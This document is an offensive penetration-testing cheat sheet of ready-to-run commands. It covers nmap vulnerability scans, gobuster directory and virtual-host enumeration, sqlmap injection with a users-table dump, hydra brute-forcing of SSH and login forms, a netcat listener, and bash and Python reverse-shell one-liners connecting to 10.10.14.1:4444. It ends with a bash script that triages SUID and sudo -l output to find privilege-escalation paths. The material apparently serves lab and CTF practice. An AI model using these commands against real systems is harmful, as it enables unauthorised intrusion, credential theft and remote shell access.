Run vulnerability detection NSE scripts against common service ports
nmap --script vuln -sV -p 80,443,22,21 <target>
Directory and file brute-force enumeration against a web server
gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt -x php,html,txt -t 50
Virtual host (subdomain) enumeration via HTTP Host header fuzzing (gobuster 3.2+ needs --append-domain so each wordlist entry is sent as entry.target.com)
gobuster vhost -u http://target.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain -t 30
Automated SQL injection discovery and database enumeration
sqlmap -u "http://target.com/page?id=1" --dbs --batch --level=3 --risk=2
POST-based SQL injection with credential dump from specific table
sqlmap -u "http://target.com/login" --data="user=admin&pass=test" --method POST -D webapp_db -T users --dump
SSH brute-force attack against a single username with rockyou wordlist
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100 -t 4 -V
HTTP POST form brute-force with custom failure string detection
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt <target> http-post-form "/login.php:username=^USER^&password=^PASS^:Invalid credentials" -t 30
Start a Netcat listener to receive an incoming reverse shell connection
nc -lvnp 4444
Bash TCP reverse shell one-liner — executes on the target to connect back
bash -i >& /dev/tcp/10.10.14.1/4444 0>&1
Python3 reverse shell one-liner for targets with Python installed
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.1",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])'
Find all SUID binaries on the system for privilege escalation opportunities
find / -perm -4000 -type f 2>/dev/null
List commands the current user can run with sudo — key privesc enumeration step
sudo -l
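The two enumeration commands above produce raw lists that still have to be read by hand. The script below is an added example (not part of the original library, not a tool from any project) that triages that output: it drops SUID binaries that a stock Debian/Ubuntu system ships with so the unusual ones stand out, and it scans `sudo -l` output for rules that grant everything, need no password, or allow a binary that can spawn a shell. The baseline list, the shell-capable list, and the two sample outputs are constructed for illustration and should be adjusted to the target's distribution.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): triage the output of
#   find / -perm -4000 -type f 2>/dev/null   and   sudo -l
# Every list and sample below is constructed for illustration.

NL=$'\n'

# SUID binaries a stock Debian/Ubuntu install ships with (constructed baseline).
# Anything not in this list deserves a closer look.
SUID_BASELINE="/usr/bin/passwd
/usr/bin/sudo
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/fusermount3
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper"

# Binaries that give back a shell or arbitrary file access when run as root
# (constructed subset of the well-known GTFOBins entries).
SHELL_CAPABLE="vim vi nano less more find awk python3 perl bash sh env tar cp"

# unexpected_suid LIST: print each path in LIST (newline-separated, as the find
# command emits it) that is not in SUID_BASELINE. Matching is on whole lines so
# /usr/bin/su does not swallow /usr/bin/sudo.
unexpected_suid() {
  printf '%s\n' "$1" | while IFS= read -r path; do
    [ -n "$path" ] || continue
    case "$NL$SUID_BASELINE$NL" in
      *"$NL$path$NL"*) ;;                 # known default, skip
      *) printf '%s\n' "$path" ;;
    esac
  done
}

# sudo_findings OUTPUT: read `sudo -l` output and print one tab-separated
# finding per line: FULL (may run ALL), NOPASSWD (no password needed),
# SHELL (first command of the rule is a shell-capable binary).
sudo_findings() {
  printf '%s\n' "$1" | while IFS= read -r line; do
    rule=$(printf '%s' "$line" | sed 's/^[[:space:]]*//')
    case "$rule" in
      \(*) ;;                             # only command rules start with "(runas)"
      *) continue ;;
    esac
    cmd=${rule##*\) }                     # text after the last "(runas) "
    cmd=${cmd#NOPASSWD: }                 # drop the tag if present
    if [ "$cmd" = "ALL" ]; then
      printf 'FULL\t%s\n' "$rule"
    fi
    case "$rule" in
      *NOPASSWD:*) printf 'NOPASSWD\t%s\n' "$rule" ;;
    esac
    bin=$(basename "${cmd%% *}")          # only the first command of a rule is checked
    for s in $SHELL_CAPABLE; do
      if [ "$bin" = "$s" ]; then
        printf 'SHELL\t%s\n' "$rule"
        break
      fi
    done
  done
}

# Constructed sample output of the find command.
SAMPLE_SUID="/usr/bin/passwd
/usr/bin/sudo
/usr/bin/su
/usr/bin/find
/usr/local/bin/backup
/usr/bin/mount"

# Constructed sample output of sudo -l for a www-data user.
SAMPLE_SUDO="Matching Defaults entries for www-data on web01:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on web01:
    (ALL) NOPASSWD: /usr/bin/vim
    (root) /usr/bin/systemctl restart nginx
    (ALL : ALL) ALL"

echo "== SUID binaries outside the baseline =="
unexpected_suid "$SAMPLE_SUID"
echo "== sudo -l findings =="
sudo_findings "$SAMPLE_SUDO"
# On a live box: unexpected_suid "$(find / -perm -4000 -type f 2>/dev/null)"
#                sudo_findings "$(sudo -l 2>/dev/null)"
```

The SUID check is deliberately a whole-line comparison against a baseline rather than a pattern match, because the interesting hits are usually custom binaries under /usr/local or /opt that no regex would anticipate. The sudo parser only looks at the first command of each rule and at the runas/NOPASSWD prefix; a rule listing several comma-separated commands still needs to be read in full.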